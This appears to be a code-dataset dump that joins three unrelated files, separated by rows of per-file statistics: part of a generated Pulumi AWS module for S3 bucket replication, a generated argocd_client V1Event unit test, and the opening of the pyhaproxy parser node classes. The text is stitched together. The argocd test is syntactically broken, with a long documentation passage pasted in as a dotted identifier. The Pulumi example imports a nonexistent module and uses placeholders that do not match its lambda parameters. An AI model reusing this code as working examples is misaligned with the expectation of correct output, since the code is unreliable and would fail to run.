:param pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if role is not None:
pulumi.set(__self__, "role", role)
if rules is not None:
pulumi.set(__self__, "rules", rules)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
"""
The name of the source S3 bucket you want Amazon S3 to monitor.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]]:
"""
Set of configuration blocks describing the rules managing the replication documented below.
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]]):
pulumi.set(self, "rules", value)
class BucketReplicationConfig(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]]] = None,
__props__=None):
"""
Provides an independent configuration resource for S3 bucket [replication configuration](http://docs.aws.amazon.com/AmazonS3/latest/dev/crr.html).
## Example Usage
### Using replication configuration
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
central = pulumi.providers.Aws("central", region="eu-central-1")
replication_role = aws.iam.Role("replicationRole", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "s3.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
destination_bucket_v2 = aws.s3.BucketV2("destinationBucketV2")
source_bucket_v2 = aws.s3.BucketV2("sourceBucketV2", opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_policy = aws.iam.Policy("replicationPolicy", policy=pulumi.Output.all(source_bucket_v2.arn, source_bucket_v2.arn, destination_bucket_v2.arn).apply(lambda sourceBucketV2Arn, sourceBucketV2Arn1, destinationBucketV2Arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": [
"s3:GetReplicationConfiguration",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn}"
]
}},
{{
"Action": [
"s3:GetObjectVersionForReplication",
"s3:GetObjectVersionAcl",
"s3:GetObjectVersionTagging"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn1}/*"
]
}},
{{
"Action": [
"s3:ReplicateObject",
"s3:ReplicateDelete",
"s3:ReplicateTags"
],
"Effect": "Allow",
"Resource": "{destination_bucket_v2_arn}/*"
}}
]
}}
\"\"\"))
replication_role_policy_attachment = aws.iam.RolePolicyAttachment("replicationRolePolicyAttachment",
role=replication_role.name,
policy_arn=replication_policy.arn)
destination_bucket_versioning_v2 = aws.s3.BucketVersioningV2("destinationBucketVersioningV2",
bucket=destination_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
source_bucket_acl = aws.s3.BucketAclV2("sourceBucketAcl",
bucket=source_bucket_v2.id,
acl="private")
source_bucket_versioning_v2 = aws.s3.BucketVersioningV2("sourceBucketVersioningV2",
bucket=source_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_bucket_replication_config = aws.s3.BucketReplicationConfig("replicationBucketReplicationConfig",
role=replication_role.arn,
bucket=source_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=destination_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[source_bucket_versioning_v2]))
```
### Bi-Directional Replication
```python
import pulumi
import pulumi_aws as aws
# ... other configuration ...
east_bucket_v2 = aws.s3.BucketV2("eastBucketV2")
east_bucket_versioning_v2 = aws.s3.BucketVersioningV2("eastBucketVersioningV2",
bucket=east_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
west_bucket_v2 = aws.s3.BucketV2("westBucketV2", opts=pulumi.ResourceOptions(provider=west))
west_bucket_versioning_v2 = aws.s3.BucketVersioningV2("westBucketVersioningV2",
bucket=west_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=west))
east_to_west = aws.s3.BucketReplicationConfig("eastToWest",
role=aws_iam_role["east_replication"]["arn"],
bucket=east_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=west_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[east_bucket_versioning_v2]))
west_to_east = aws.s3.BucketReplicationConfig("westToEast",
role=aws_iam_role["west_replication"]["arn"],
bucket=west_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=east_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[west_bucket_versioning_v2]))
```
## Import
S3 bucket replication configuration can be imported using the `bucket`, e.g.
```sh
$ pulumi import aws:s3/bucketReplicationConfig:BucketReplicationConfig replication bucket-name
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BucketReplicationConfigArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an independent configuration resource for S3 bucket [replication configuration](http://docs.aws.amazon.com/AmazonS3/latest/dev/crr.html).
## Example Usage
### Using replication configuration
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
central = pulumi.providers.Aws("central", region="eu-central-1")
replication_role = aws.iam.Role("replicationRole", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "s3.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
destination_bucket_v2 = aws.s3.BucketV2("destinationBucketV2")
source_bucket_v2 = aws.s3.BucketV2("sourceBucketV2", opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_policy = aws.iam.Policy("replicationPolicy", policy=pulumi.Output.all(source_bucket_v2.arn, source_bucket_v2.arn, destination_bucket_v2.arn).apply(lambda sourceBucketV2Arn, sourceBucketV2Arn1, destinationBucketV2Arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": [
"s3:GetReplicationConfiguration",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn}"
]
}},
{{
"Action": [
"s3:GetObjectVersionForReplication",
"s3:GetObjectVersionAcl",
"s3:GetObjectVersionTagging"
],
"Effect": "Allow",
"Resource": [
"{source_bucket_v2_arn1}/*"
]
}},
{{
"Action": [
"s3:ReplicateObject",
"s3:ReplicateDelete",
"s3:ReplicateTags"
],
"Effect": "Allow",
"Resource": "{destination_bucket_v2_arn}/*"
}}
]
}}
\"\"\"))
replication_role_policy_attachment = aws.iam.RolePolicyAttachment("replicationRolePolicyAttachment",
role=replication_role.name,
policy_arn=replication_policy.arn)
destination_bucket_versioning_v2 = aws.s3.BucketVersioningV2("destinationBucketVersioningV2",
bucket=destination_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
source_bucket_acl = aws.s3.BucketAclV2("sourceBucketAcl",
bucket=source_bucket_v2.id,
acl="private")
source_bucket_versioning_v2 = aws.s3.BucketVersioningV2("sourceBucketVersioningV2",
bucket=source_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=aws["central"]))
replication_bucket_replication_config = aws.s3.BucketReplicationConfig("replicationBucketReplicationConfig",
role=replication_role.arn,
bucket=source_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=destination_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[source_bucket_versioning_v2]))
```
### Bi-Directional Replication
```python
import pulumi
import pulumi_aws as aws
# ... other configuration ...
east_bucket_v2 = aws.s3.BucketV2("eastBucketV2")
east_bucket_versioning_v2 = aws.s3.BucketVersioningV2("eastBucketVersioningV2",
bucket=east_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
))
west_bucket_v2 = aws.s3.BucketV2("westBucketV2", opts=pulumi.ResourceOptions(provider=west))
west_bucket_versioning_v2 = aws.s3.BucketVersioningV2("westBucketVersioningV2",
bucket=west_bucket_v2.id,
versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(
status="Enabled",
),
opts=pulumi.ResourceOptions(provider=west))
east_to_west = aws.s3.BucketReplicationConfig("eastToWest",
role=aws_iam_role["east_replication"]["arn"],
bucket=east_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=west_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[east_bucket_versioning_v2]))
west_to_east = aws.s3.BucketReplicationConfig("westToEast",
role=aws_iam_role["west_replication"]["arn"],
bucket=west_bucket_v2.id,
rules=[aws.s3.BucketReplicationConfigRuleArgs(
id="foobar",
prefix="foo",
status="Enabled",
destination=aws.s3.BucketReplicationConfigRuleDestinationArgs(
bucket=east_bucket_v2.arn,
storage_class="STANDARD",
),
)],
opts=pulumi.ResourceOptions(depends_on=[west_bucket_versioning_v2]))
```
## Import
S3 bucket replication configuration can be imported using the `bucket`, e.g.
```sh
$ pulumi import aws:s3/bucketReplicationConfig:BucketReplicationConfig replication bucket-name
```
:param str resource_name: The name of the resource.
:param BucketReplicationConfigArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BucketReplicationConfigArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BucketReplicationConfigArgs.__new__(BucketReplicationConfigArgs)
if bucket is None and not opts.urn:
raise TypeError("Missing required property 'bucket'")
__props__.__dict__["bucket"] = bucket
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
if rules is None and not opts.urn:
raise TypeError("Missing required property 'rules'")
__props__.__dict__["rules"] = rules
super(BucketReplicationConfig, __self__).__init__(
'aws:s3/bucketReplicationConfig:BucketReplicationConfig',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]]] = None) -> 'BucketReplicationConfig':
"""
Get an existing BucketReplicationConfig resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketReplicationConfigRuleArgs']]]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BucketReplicationConfigState.__new__(_BucketReplicationConfigState)
__props__.__dict__["bucket"] = bucket
__props__.__dict__["role"] = role
__props__.__dict__["rules"] = rules
return BucketReplicationConfig(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def bucket(self) -> pulumi.Output[str]:
"""
The name of the source S3 bucket you want Amazon S3 to monitor.
"""
return pulumi.get(self, "bucket")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter
def rules(self) -> pulumi.Output[Sequence['outputs.BucketReplicationConfigRule']]:
"""
Set of configuration blocks describing the rules managing the replication documented below.
"""
return pulumi.get(self, "rules")
| 42.637201
| 246
| 0.611956
| 2,182
| 23,152
| 6.296975
| 0.111824
| 0.044833
| 0.02853
| 0.023654
| 0.850946
| 0.831805
| 0.822344
| 0.804876
| 0.801164
| 0.8
| 0
| 0.014246
| 0.287491
| 23,152
| 542
| 247
| 42.715867
| 0.818683
| 0.579259
| 0
| 0.530201
| 1
| 0
| 0.119147
| 0.063153
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147651
| false
| 0.006711
| 0.04698
| 0
| 0.281879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d84999daea04c3cd59781b5dba9b6be8e14234ea
| 11,789
|
py
|
Python
|
test/test_v1_event.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2021-09-29T11:57:07.000Z
|
2021-09-29T11:57:07.000Z
|
test/test_v1_event.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2020-09-09T00:28:57.000Z
|
2020-09-09T00:28:57.000Z
|
test/test_v1_event.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 2
|
2020-10-13T18:31:59.000Z
|
2021-02-15T12:52:33.000Z
|
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import argocd_client
from argocd_client.models.v1_event import V1Event # noqa: E501
from argocd_client.rest import ApiException
class TestV1Event(unittest.TestCase):
"""V1Event unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test V1Event
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = argocd_client.models.v1_event.V1Event() # noqa: E501
if include_optional :
return V1Event(
action = '0',
count = 56,
event_time = argocd_client.models.v1_micro_time.v1MicroTime(
nanos = 56,
seconds = '0', ),
first_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
involved_object = argocd_client.models.object_reference_contains_enough_information_to_let_you_inspect_or_modify_the_referred_object/
___
new_uses_of_this_type_are_discouraged_because_of_difficulty_describing_its_usage_when_embedded_in_ap_is/
_1/_ignored_fields/__it_includes_many_fields_which_are_not_generally_honored/__for_instance,_resource_version_and_field_path_are_both_very_rarely_valid_in_actual_usage/
_2/_invalid_usage_help/__it_is_impossible_to_add_specific_help_for_individual_usage/__in_most_embedded_usages,_there_are_particular
____restrictions_like,_"must_refer_only_to_types_a_and_b"_or_"uid_not_honored"_or_"name_must_be_restricted"/
____those_cannot_be_well_described_when_embedded/
_3/_inconsistent_validation/__because_the_usages_are_different,_the_validation_rules_are_different_by_usage,_which_makes_it_hard_for_users_to_predict_what_will_happen/
_4/_the_fields_are_both_imprecise_and_overly_precise/__kind_is_not_a_precise_mapping_to_a_url/_this_can_produce_ambiguity
____during_interpretation_and_require_a_rest_mapping/__in_most_cases,_the_dependency_is_on_the_group,resource_tuple
____and_the_version_of_the_actual_struct_is_irrelevant/
_5/_we_cannot_easily_change_it/__because_this_type_is_embedded_in_many_locations,_updates_to_this_type
____will_affect_numerous_schemas/__don't_make_new_ap_is_embed_an_underspecified_api_type_they_do_not_control/
instead_of_using_this_type,_create_a_locally_provided_and_used_type_that_is_well_focused_on_your_reference/
for_example,_service_references_for_admission_registration:_https://github/com/kubernetes/api/blob/release_1/17/admissionregistration/v1/types/go#l533_/
+k8s:deepcopy_gen:interfaces=k8s/io/apimachinery/pkg/runtime/object.ObjectReference contains enough information to let you inspect or modify the referred object.
---
New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs.
1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage.
2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular
restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted".
Those cannot be well described when embedded.
3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen.
4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity
during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple
and the version of the actual struct is irrelevant.
5. We cannot easily change it. Because this type is embedded in many locations, updates to this type
will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control.
Instead of using this type, create a locally provided and used type that is well-focused on your reference.
For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
+k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object(
api_version = '0',
field_path = '0',
kind = '0',
name = '0',
namespace = '0',
resource_version = '0',
uid = '0', ),
last_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
message = '0',
metadata = argocd_client.models.v1_object_meta.v1ObjectMeta(
annotations = {
'key' : '0'
},
cluster_name = '0',
creation_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
deletion_grace_period_seconds = '0',
deletion_timestamp = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ),
finalizers = [
'0'
],
generate_name = '0',
generation = '0',
labels = {
'key' : '0'
},
managed_fields = [
argocd_client.models.v1_managed_fields_entry.v1ManagedFieldsEntry(
api_version = '0',
fields_type = '0',
fields_v1 = argocd_client.models.v1_fields_v1.v1FieldsV1(
raw = 'YQ==', ),
manager = '0',
operation = '0',
time = argocd_client.models.v1_time.v1Time(
nanos = 56,
seconds = '0', ), )
],
name = '0',
namespace = '0',
owner_references = [
argocd_client.models.v1_owner_reference.v1OwnerReference(
api_version = '0',
block_owner_deletion = True,
controller = True,
kind = '0',
name = '0',
uid = '0', )
],
resource_version = '0',
self_link = '0',
uid = '0', ),
reason = '0',
related = argocd_client.models.object_reference_contains_enough_information_to_let_you_inspect_or_modify_the_referred_object/
___
new_uses_of_this_type_are_discouraged_because_of_difficulty_describing_its_usage_when_embedded_in_ap_is/
_1/_ignored_fields/__it_includes_many_fields_which_are_not_generally_honored/__for_instance,_resource_version_and_field_path_are_both_very_rarely_valid_in_actual_usage/
_2/_invalid_usage_help/__it_is_impossible_to_add_specific_help_for_individual_usage/__in_most_embedded_usages,_there_are_particular
____restrictions_like,_"must_refer_only_to_types_a_and_b"_or_"uid_not_honored"_or_"name_must_be_restricted"/
____those_cannot_be_well_described_when_embedded/
_3/_inconsistent_validation/__because_the_usages_are_different,_the_validation_rules_are_different_by_usage,_which_makes_it_hard_for_users_to_predict_what_will_happen/
_4/_the_fields_are_both_imprecise_and_overly_precise/__kind_is_not_a_precise_mapping_to_a_url/_this_can_produce_ambiguity
____during_interpretation_and_require_a_rest_mapping/__in_most_cases,_the_dependency_is_on_the_group,resource_tuple
____and_the_version_of_the_actual_struct_is_irrelevant/
_5/_we_cannot_easily_change_it/__because_this_type_is_embedded_in_many_locations,_updates_to_this_type
____will_affect_numerous_schemas/__don't_make_new_ap_is_embed_an_underspecified_api_type_they_do_not_control/
instead_of_using_this_type,_create_a_locally_provided_and_used_type_that_is_well_focused_on_your_reference/
for_example,_service_references_for_admission_registration:_https://github/com/kubernetes/api/blob/release_1/17/admissionregistration/v1/types/go#l533_/
+k8s:deepcopy_gen:interfaces=k8s/io/apimachinery/pkg/runtime/object.ObjectReference contains enough information to let you inspect or modify the referred object.
---
New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs.
1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage.
2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular
restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted".
Those cannot be well described when embedded.
3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen.
4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity
during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple
and the version of the actual struct is irrelevant.
5. We cannot easily change it. Because this type is embedded in many locations, updates to this type
will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control.
Instead of using this type, create a locally provided and used type that is well-focused on your reference.
For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
+k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object(
api_version = '0',
field_path = '0',
kind = '0',
name = '0',
namespace = '0',
resource_version = '0',
uid = '0', ),
reporting_component = '0',
reporting_instance = '0',
series = argocd_client.models.v1_event_series.v1EventSeries(
count = 56,
last_observed_time = argocd_client.models.v1_micro_time.v1MicroTime(
nanos = 56,
seconds = '0', ),
state = '0', ),
source = argocd_client.models.v1_event_source.v1EventSource(
component = '0',
host = '0', ),
type = '0'
)
else :
return V1Event(
)
def testV1Event(self):
"""Test V1Event"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 59.241206
| 168
| 0.676393
| 1,470
| 11,789
| 4.990476
| 0.189116
| 0.03108
| 0.041712
| 0.040894
| 0.815976
| 0.791303
| 0.791303
| 0.791303
| 0.791303
| 0.791303
| 0
| 0.020021
| 0.262787
| 11,789
| 198
| 169
| 59.540404
| 0.824071
| 0.009246
| 0
| 0.623529
| 1
| 0.105882
| 0.03092
| 0.009773
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.011765
| 0.035294
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d86c45907b72f4c0156dfbfcbdb4ecb0efbe4a8c
| 140,320
|
py
|
Python
|
pyhaproxy/pegnode.py
|
alisson276/pyhaproxy
|
7d38c7134689423081544f63d1ebb72b1e387199
|
[
"MIT"
] | 51
|
2015-11-25T08:31:43.000Z
|
2022-01-12T06:19:02.000Z
|
pyhaproxy/pegnode.py
|
alisson276/pyhaproxy
|
7d38c7134689423081544f63d1ebb72b1e387199
|
[
"MIT"
] | 16
|
2015-12-18T05:27:59.000Z
|
2021-02-08T04:16:56.000Z
|
pyhaproxy/pegnode.py
|
alisson276/pyhaproxy
|
7d38c7134689423081544f63d1ebb72b1e387199
|
[
"MIT"
] | 18
|
2016-01-07T10:30:28.000Z
|
2021-11-07T19:49:07.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import re
class TreeNode(object):
def __init__(self, text, offset, elements=None):
self.text = text
self.offset = offset
self.elements = elements or []
def __iter__(self):
for el in self.elements:
yield el
class GlobalSection(TreeNode):
def __init__(self, text, offset, elements):
super(GlobalSection, self).__init__(text, offset, elements)
self.global_header = elements[0]
self.config_block = elements[1]
class DefaultsSection(TreeNode):
def __init__(self, text, offset, elements):
super(DefaultsSection, self).__init__(text, offset, elements)
self.defaults_header = elements[0]
self.config_block = elements[1]
class UserlistSection(TreeNode):
def __init__(self, text, offset, elements):
super(UserlistSection, self).__init__(text, offset, elements)
self.userlist_header = elements[0]
self.config_block = elements[1]
class ListenSection(TreeNode):
def __init__(self, text, offset, elements):
super(ListenSection, self).__init__(text, offset, elements)
self.listen_header = elements[0]
self.config_block = elements[1]
class FrontendSection(TreeNode):
def __init__(self, text, offset, elements):
super(FrontendSection, self).__init__(text, offset, elements)
self.frontend_header = elements[0]
self.config_block = elements[1]
class BackendSection(TreeNode):
def __init__(self, text, offset, elements):
super(BackendSection, self).__init__(text, offset, elements)
self.backend_header = elements[0]
self.config_block = elements[1]
class GlobalHeader(TreeNode):
def __init__(self, text, offset, elements):
super(GlobalHeader, self).__init__(text, offset, elements)
self.whitespace = elements[2]
self.line_break = elements[4]
class UserlistHeader(TreeNode):
def __init__(self, text, offset, elements):
super(UserlistHeader, self).__init__(text, offset, elements)
self.whitespace = elements[2]
self.proxy_name = elements[3]
self.line_break = elements[5]
class DefaultsHeader(TreeNode):
def __init__(self, text, offset, elements):
super(DefaultsHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.line_break = elements[6]
self.proxy_name = elements[3]
class ListenHeader(TreeNode):
def __init__(self, text, offset, elements):
super(ListenHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.proxy_name = elements[3]
self.line_break = elements[8]
self.service_address = elements[5]
class FrontendHeader(TreeNode):
def __init__(self, text, offset, elements):
super(FrontendHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.proxy_name = elements[3]
self.line_break = elements[8]
self.service_address = elements[5]
class BackendHeader(TreeNode):
def __init__(self, text, offset, elements):
super(BackendHeader, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.proxy_name = elements[3]
self.line_break = elements[7]
class ServerLine(TreeNode):
def __init__(self, text, offset, elements):
super(ServerLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.server_name = elements[3]
self.service_address = elements[5]
self.line_break = elements[8]
self.value = elements[6]
class OptionLine(TreeNode):
def __init__(self, text, offset, elements):
super(OptionLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.whitespaceplus = elements[2]
self.keyword = elements[3]
self.line_break = elements[7]
self.value = elements[5]
class BindLine(TreeNode):
def __init__(self, text, offset, elements):
super(BindLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.service_address = elements[3]
self.line_break = elements[7]
self.value = elements[5]
class AclLine(TreeNode):
def __init__(self, text, offset, elements):
super(AclLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.acl_name = elements[3]
self.line_break = elements[7]
self.value = elements[5]
class BackendLine(TreeNode):
def __init__(self, text, offset, elements):
super(BackendLine, self).__init__(text, offset, elements)
self.whitespace = elements[6]
self.backend_name = elements[3]
self.line_break = elements[9]
self.operator = elements[5]
self.backend_condition = elements[7]
self.backendtype = elements[1]
class GroupLine(TreeNode):
def __init__(self, text, offset, elements):
super(GroupLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.group_name = elements[3]
self.line_break = elements[8]
self.users_fragment = elements[6]
class TreeNode19(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode19, self).__init__(text, offset, elements)
self.whitespace = elements[1]
class UserLine(TreeNode):
def __init__(self, text, offset, elements):
super(UserLine, self).__init__(text, offset, elements)
self.whitespace = elements[8]
self.user_name = elements[3]
self.password = elements[7]
self.line_break = elements[12]
self.groups_fragment = elements[10]
self.passwd_type = elements[5]
class TreeNode21(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode21, self).__init__(text, offset, elements)
self.whitespace = elements[1]
class ConfigLine(TreeNode):
def __init__(self, text, offset, elements):
super(ConfigLine, self).__init__(text, offset, elements)
